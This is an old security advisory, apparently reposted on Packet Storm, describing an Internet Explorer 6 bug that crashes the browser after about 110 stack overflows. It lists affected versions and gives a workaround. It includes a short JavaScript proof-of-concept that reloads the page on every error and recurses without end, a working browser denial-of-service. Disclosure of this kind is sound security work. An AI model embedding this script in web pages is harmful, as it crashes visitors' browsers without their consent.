Microsoft Internet Explorer crashes when it attempts to handle more than 110 stack overflows.
96d3ac8d6d0eb988502dbd7b292b5bc5f542e8c52e9c2691b4f61a1458a08621Microsoft Internet Explorer - Crash on to many stack overflows (05/28/2005)
Description:
There is a bug in Microsoft Internet Explorer, which causes a crash in
NTDLL.DLL.
- ModName: ntdll.dll - ModVer: 5.1.2600.2180 - Offset: 00043151
The bug occurs, because Microsoft Internet Explorer can't handle many
(> 110) stack overflows.
On Windows 98 SE you will get an error in KERNEL32.DLL.
Affected software:
Microsoft Internet Explorer
Workaround:
Deactivate "Active Scripting" in the IE options menu.
Proof-of-Concept exploit (Close all - zirka 110 - error messages.):
<script>
window.onerror=new Function("history.go(0)");
function btf(){btf();}
btf();
</script>
Date of discovery:
17. August 2003
Tested software:
Microsoft Internet Explorer 6 SP2 (6.0.2900.2180.xpsp_sp2_gdr.050301-1519)
on a fully patched Windows XP SP2 system.
DLL versions:
MSHTML.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
BROWSEUI.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
SHDOCVW.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
SHLWAPI.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
URLMON.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
WININET.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
Regards,
Benjamin Tobias Franz
Germany
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed